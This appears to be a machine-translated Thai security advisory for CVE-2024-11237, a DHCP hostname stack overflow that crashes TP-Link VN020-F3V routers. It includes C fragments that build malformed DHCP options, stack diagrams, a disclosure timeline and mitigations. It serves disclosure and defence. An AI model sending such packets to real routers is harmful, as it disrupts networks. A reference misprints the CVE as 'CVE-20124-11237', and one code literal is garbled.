TP Thumper

ช่องโหว่ที่สำคัญถูกค้นพบในเราเตอร์ TP-Link VN020 F3V (T) ที่ใช้งานเฟิร์มแวร์เวอร์ชัน TT_V6.2.1021 ช่องโหว่ช่วยให้ผู้โจมตีจากระยะไกลสามารถเรียกใช้บัฟเฟอร์ที่ใช้สแต็กผ่านแพ็คเก็ต DHCP Discover ที่สร้างขึ้นเป็นพิเศษซึ่งนำไปสู่เงื่อนไขการปฏิเสธการบริการ (DOS)

อุปกรณ์ที่ได้รับผลกระทบ:

• รุ่นเราเตอร์: TP-Link VN020-F3V (t)
• เวอร์ชันเฟิร์มแวร์: TT_V6.2.1021
• การปรับใช้: ส่วนใหญ่ผ่าน Tunisie Telecom และ Topnet ISP
• ตัวแปรที่ได้รับการยืนยัน: ยังส่งผลกระทบต่อเวอร์ชันแอลจีเรียและโมร็อกโก

หมายเหตุสำคัญ: เนื่องจากลักษณะที่เป็นกรรมสิทธิ์ของเฟิร์มแวร์จึงไม่ทราบรายละเอียดการใช้งานภายในที่แน่นอน การวิเคราะห์นี้ขึ้นอยู่กับพฤติกรรมที่สังเกตได้และการทดสอบกล่องดำ

• CVE ID : CVE-2024-11237
• ประเภท : บัฟเฟอร์ที่ใช้สแต็ก (CWE-121)
• Attack Vector : Remote (DHCP Discover Packet)
• การรับรองความถูกต้อง : ไม่จำเป็น
• พอร์ต : UDP/67 (เซิร์ฟเวอร์ DHCP)
• ผลกระทบ : DOS (ยืนยัน) & RCE (เป็นไปได้)
• ความซับซ้อน : ต่ำ

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

1. การประมวลผลชื่อโฮสต์ DHCP

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

2. ตัวเลือกเฉพาะของผู้ขาย

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

3. การจัดการสนามยาว

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

ในขณะที่ไม่ทราบการใช้งานภายในที่แน่นอน แต่พฤติกรรมที่สังเกตได้แสดงให้เห็นถึงปัญหาการทุจริตของหน่วยความจำที่อาจเกิดขึ้น:

การประมวลผลชื่อโฮสต์ DHCP ปกติ

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

สิ่งที่อาจเกิดขึ้นภายในเราเตอร์?

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

นี่เป็นทฤษฎีและรายละเอียดบางอย่างอาจไม่ถูกต้องทั้งหมดเนื่องจาก TP-Link ให้เฟิร์มแวร์สำหรับเราเตอร์นี้โดยเฉพาะกับ ISP

เราเตอร์อาจพยายามรีสตาร์ทตัวเองตามที่แสดงที่นี่เนื่องจากความผิดพลาดดังที่แสดงไว้ที่นี่:

• อุปกรณ์ไม่ตอบสนองทันที
• ความล้มเหลวของบริการ DHCP
• รีสตาร์ทเราเตอร์อัตโนมัติ
• การหยุดชะงักของเครือข่ายที่ต้องใช้การแทรกแซงด้วยตนเอง

• การค้นพบครั้งแรก : 20 ตุลาคม 2567
• การแจ้งเตือนผู้ขาย : 3 พฤศจิกายน 2567
• การมอบหมาย CVE : 15 พฤศจิกายน 2567

ขณะนี้ไม่มีแพตช์อย่างเป็นทางการ การบรรเทาชั่วคราวรวมถึง:

1. ปิดใช้งานเซิร์ฟเวอร์ DHCP หากไม่จำเป็น
2. ใช้การกรองทราฟฟิก DHCP ที่ขอบเครือข่าย
3. พิจารณาโมเดลเราเตอร์ทางเลือกถ้าเป็นไปได้

1. CVE-20124-11237
2. CWE-121: บัฟเฟอร์ที่ใช้สแต็ก

Mohamed Maatallah

• GitHub: @zephkek
• ความร่วมมือ: นักวิจัยด้านความปลอดภัยอิสระ